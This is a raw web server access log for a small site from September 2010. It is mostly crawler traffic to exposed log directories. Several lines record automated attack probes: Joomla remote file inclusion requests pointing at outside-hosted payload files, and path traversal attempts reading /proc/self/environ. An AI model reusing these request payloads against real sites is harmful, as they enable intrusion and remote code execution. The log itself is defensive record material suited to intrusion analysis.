91.200.108.218 - - [03/Sep/2010:18:05:38 -0700] "GET / HTTP/1.1" 200 779 "http://refhide.com/?http://virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
213.180.209.11 - - [03/Sep/2010:18:16:39 -0700] "GET /logs/access.log HTTP/1.1" 200 225 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
174.127.132.10 - - [03/Sep/2010:19:09:45 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)" "virtualsupplynet.com"
213.180.209.11 - - [03/Sep/2010:21:41:54 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:41:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:41:46 -0700] "GET / HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:41:52 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:41:56 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:00 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:04 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:09 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:14 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:18 -0700] "GET /logs/access.log HTTP/1.0" 200 2121 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:21 -0700] "GET /logs/access_100417.log HTTP/1.0" 200 70879 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:25 -0700] "GET /logs/access_100424.log HTTP/1.0" 200 61491 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:29 -0700] "GET /logs/access_100501.log HTTP/1.0" 200 73111 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:33 -0700] "GET /logs/access_100508.log HTTP/1.0" 200 116956 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:37 -0700] "GET /logs/access_100515.log HTTP/1.0" 200 147627 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:40 -0700] "GET /logs/access_100522.log HTTP/1.0" 200 103608 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:44 -0700] "GET /logs/access_100529.log HTTP/1.0" 200 87564 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:48 -0700] "GET /logs/access_100605.log HTTP/1.0" 200 125664 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:52 -0700] "GET /logs/access_100612.log HTTP/1.0" 200 104934 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:42:56 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 114275 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:01 -0700] "GET /logs/access_100626.log HTTP/1.0" 200 104629 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:06 -0700] "GET /logs/access_100703.log HTTP/1.0" 200 96073 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:10 -0700] "GET /logs/access_100710.log HTTP/1.0" 200 105686 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:13 -0700] "GET /logs/access_100717.log HTTP/1.0" 200 298963 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:18 -0700] "GET /logs/access_100724.log HTTP/1.0" 200 216202 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:22 -0700] "GET /logs/access_100731.log HTTP/1.0" 200 213363 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:25 -0700] "GET /logs/access_100807.log HTTP/1.0" 200 181067 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:29 -0700] "GET /logs/access_100814.log HTTP/1.0" 200 164558 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:33 -0700] "GET /logs/access_100821.log HTTP/1.0" 200 95305 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:37 -0700] "GET /logs/access_100828.log HTTP/1.0" 200 97540 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:40 -0700] "GET /logs/access_100904.log HTTP/1.0" 200 80823 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:44 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1498 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:47 -0700] "GET /logs/?D=A HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:50 -0700] "GET /logs/?M=A HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:54 -0700] "GET /logs/?N=D HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:43:57 -0700] "GET /logs/?S=A HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:00 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:04 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:07 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:10 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:13 -0700] "GET /?D=D HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:17 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:20 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:24 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:28 -0700] "GET /logs/?D=D HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:31 -0700] "GET /logs/?N=A HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:35 -0700] "GET /logs/?M=D HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:38 -0700] "GET /logs/?S=D HTTP/1.0" 200 3782 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:41 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:44 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:48 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
94.75.247.240 - - [03/Sep/2010:23:44:51 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "TwengaBot-Discover (http://www.twenga.fr/bot-discover.html)" "www.virtualsupplynet.com"
213.180.209.11 - - [04/Sep/2010:01:08:28 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:49:19 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:49:19 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:49:19 -0700] "GET /logs/access_100417.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:53:09 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:53:09 -0700] "GET /logs/access_100529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
195.206.58.218 - - [04/Sep/2010:03:53:09 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://yeshouse.mk.co.kr/column/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:11 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:12 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:13 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:14 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:15 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:16 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:17 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:18 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:19 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.33 - - [04/Sep/2010:04:16:20 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
174.121.166.146 - - [04/Sep/2010:06:19:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.venaltectol.com/media/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
174.121.166.146 - - [04/Sep/2010:06:19:41 -0700] "GET /logs/access_100703.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.venaltectol.com/media/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
174.121.166.146 - - [04/Sep/2010:06:19:41 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.venaltectol.com/media/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
174.121.166.146 - - [04/Sep/2010:06:20:42 -0700] "GET /logs/access_100626.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.venaltectol.com/media/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
213.180.209.11 - - [04/Sep/2010:07:07:41 -0700] "GET /logs/access_100724.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.115.249 - - [04/Sep/2010:07:15:23 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
208.80.194.53 - - [04/Sep/2010:09:44:39 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; ZangoToolbar 4.8.3)" "www.virtualsupplynet.com"
213.180.209.11 - - [04/Sep/2010:11:54:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
207.218.231.66 - - [04/Sep/2010:13:05:18 -0700] "GET /logs/index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
207.218.231.66 - - [04/Sep/2010:13:05:18 -0700] "GET /index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
88.250.57.232 - - [04/Sep/2010:16:33:22 -0700] "GET /logs/access_100903.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
66.249.65.252 - - [04/Sep/2010:17:27:01 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
66.249.65.225 - - [04/Sep/2010:18:09:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
66.249.65.205 - - [04/Sep/2010:18:09:50 -0700] "GET /logs/access_100410.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
208.80.194.26 - - [04/Sep/2010:22:43:51 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; .NET CLR 1.1.4322; HbTools 4.8.2; yplus 4.1.00b)" "virtualsupplynet.com"
213.180.209.11 - - [04/Sep/2010:23:21:11 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [05/Sep/2010:03:19:25 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Sep/2010:05:44:07 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
69.175.112.34 - - [05/Sep/2010:06:52:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "virtualsupplynet.com"
69.175.112.34 - - [05/Sep/2010:06:52:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "virtualsupplynet.com"
69.175.112.34 - - [05/Sep/2010:06:52:00 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "virtualsupplynet.com"
66.249.65.250 - - [05/Sep/2010:10:39:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
217.217.86.204 - - [05/Sep/2010:11:05:16 -0700] "HEAD /logs/access.log HTTP/1.0" 200 0 "-" "Wget/1.11.4" "virtualsupplynet.com"
217.217.86.204 - - [05/Sep/2010:11:26:06 -0700] "GET /logs/access.log HTTP/1.0" 200 19589 "-" "Wget/1.11.4" "virtualsupplynet.com"
213.180.209.11 - - [05/Sep/2010:12:55:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
213.180.209.11 - - [05/Sep/2010:15:40:25 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:19 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:34 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
76.242.100.234 - - [05/Sep/2010:16:00:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
88.250.57.232 - - [05/Sep/2010:16:32:56 -0700] "GET /logs/access_100904.log HTTP/1.0" 200 80823 "-" "Wget/1.11.4" "virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:56:55 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:56:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:58:09 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:58:10 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:59:56 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:16:59:56 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:17:00:32 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "virtualsupplynet.com"
89.31.97.233 - - [05/Sep/2010:17:00:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.arena-atletiek.nl/components/com_ccnewsletter/views/ccnewsletter/tmpl/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "virtualsupplynet.com"
213.180.209.11 - - [05/Sep/2010:19:03:45 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.80.194.34 - - [05/Sep/2010:19:31:03 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; InfoPath.1)" "www.virtualsupplynet.com"
207.46.13.134 - - [05/Sep/2010:21:13:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.13.134 - - [05/Sep/2010:21:23:00 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
213.180.209.11 - - [05/Sep/2010:22:31:34 -0700] "GET /logs/access_100807.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
213.180.209.11 - - [06/Sep/2010:03:39:11 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
94.76.244.219 - - [06/Sep/2010:03:55:04 -0700] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
